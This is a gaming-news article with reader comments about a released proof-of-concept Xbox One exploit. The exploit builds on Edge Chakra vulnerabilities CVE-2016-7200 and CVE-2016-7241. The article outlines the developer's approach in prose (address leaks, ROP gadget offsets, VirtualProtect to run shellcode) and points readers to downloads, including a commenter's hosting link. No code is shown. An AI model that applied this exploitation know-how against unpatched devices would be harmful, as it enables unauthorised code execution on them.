Xbox One hack: Xbox One Exploit Proof of Concept released, based on Chakra exploit (unconfirmed)
Developer unknownv2 has released a proof of concept exploit for the Xbox One. The exploit leverages a series of known vulnerabilities in the Microsoft Edge Browser (CVE-2016-7200 and CVE-2016-7241). We have not confirmed if this exploit works here at wololo.net (yup, I still don’t have an Xbox One…).
The Xbox One uses Microsoft’s Edge browser. Pretty much the same browser that you used once on Windows 10, to download google Chrome.
In November last year, several critical vulnerabilities were found in the Edge browser, and disclosed by Microsoft as they patched them. A proof of concept was released for these vulnerabilities by developer Brian Pak, demonstrating how to use them in an exploit. This is known as the Chakra exploit, and a good read on the topic can be found here.
Hacker unknownv2 has built his Xbox One exploit on top of Brian Pak’s proof of concept. In the developer’s words:
The POC itself was mostly complete, but the first bug (CVE-2016-7200) it used was patched on the console. I used Json.Parse bug (CVE-2016-7241) to leak addresses instead and after a bit of tweaking with the values, I was able to get the correct address for the chakra.dll. From there, I modified the POC by changing the code addresses for the gadgets and the VirtualProtect function call to make the shellcode executable.
This is a userland exploit, similar to webkit exploits that many of us are familiar with. From unknownv2:
Currently the Xbox One has a sandboxed AppContainer protection just like Windows 10. Therefore, the Edge app and its code has restricted access to the file’s resources and further work is needed to escalate the process’s privileges. This could be in the form of a kernel exploit.
The sandbox is similar to the PS4 in the sense that it is limited in what you can do, but its the same thing as getting RCE on Edge on Windows 10 essentially.
Unknownv2’s exploit works on XBox One’s firmware 10.0.14393.2152 (released in December last year), according to the developer. Note that a new firmware update for Xbox One was released earlier this week, it is not clear of that firmware patches the vulnerabilities involved here.
I do not have an xbox one and cannot verify that the exploit indeed works. With that being said, there’s enough hints pointing to this being real so if you have an XBox running on the affected firmware, feel free to give it a try and comment.
Download Chakra exploit for XBox
You can get the necessary files from the developer’s github here. Please leave your feedback in the comments below!
Source: unknownv2
You know what? I’m HANDSOME!
You are very handsome
First w00t w00t
fail wOOt wOOt
Unknownv2 did some legit work back in the 360 days with game mods/tools. Inclined to believe this is legit
why the hacker make it public, for microsoft to patch it? better they make a cfw so microsoft or sony cant patch it 😉
And how exactly would the release of a CFW prevent them from patching anything?
Fyi, the vulnerability is known since 2016 09 09, so the hacker didn’t publicize anything.
Looking forward to Smach Z pro, and the new next portable gaming console from Sony.
Also I love Playstation 2 games, they should remaster them in a new handheld console.
Keep useless comments about PlayStation out of here.
Okay here is a comment not about PlayStation:
XBox One is so inferior Wololo doesn’t even care to own one.
In which way is the Xbox One inferior?
All consoles are inferior to the PC master race.
Or maybe, he just doesn’t *prefer* it… Huh, imagine that. Not inferior or superior, just preference? Impossible.
Commadore 64 FTW! shove xbox and ps4 up your bu.mhole
I’ve tested this and it does work, but without a sandbox or kernel exploit it’s not super useful. It is very useful if you are developing a sandbox or kernel exploit, though…
it works try it yourself raptordmg.000webhostapp.com
Has anyone tried on current fw? I dont want to update.
And yea, next step is kexploit via sc. go for it! 🙂
Patched on latest Alpha Preview build. Really sad. Could just need some modding, though. I have no idea.
I have my xbone on the exact firmware and it says exploit done (https://cdn.discordapp.com/attachments/267022506622189570/298159104122159114/26004.jpg)
Yeah, here’s the problem now though. I also have an Xbox One on this firmware, but I tried the exploit today, and the Xbox One will not even connect to machines on the local network without updating the console. I don’t think there’s any way possible to use this exploit anymore. Please correct me if I’m wrong.
hacked facebook account please get it back
The master chief can smell this one.
i hope somebody could hack the kernel and we could get a fully working windows 10 running on the xbox one s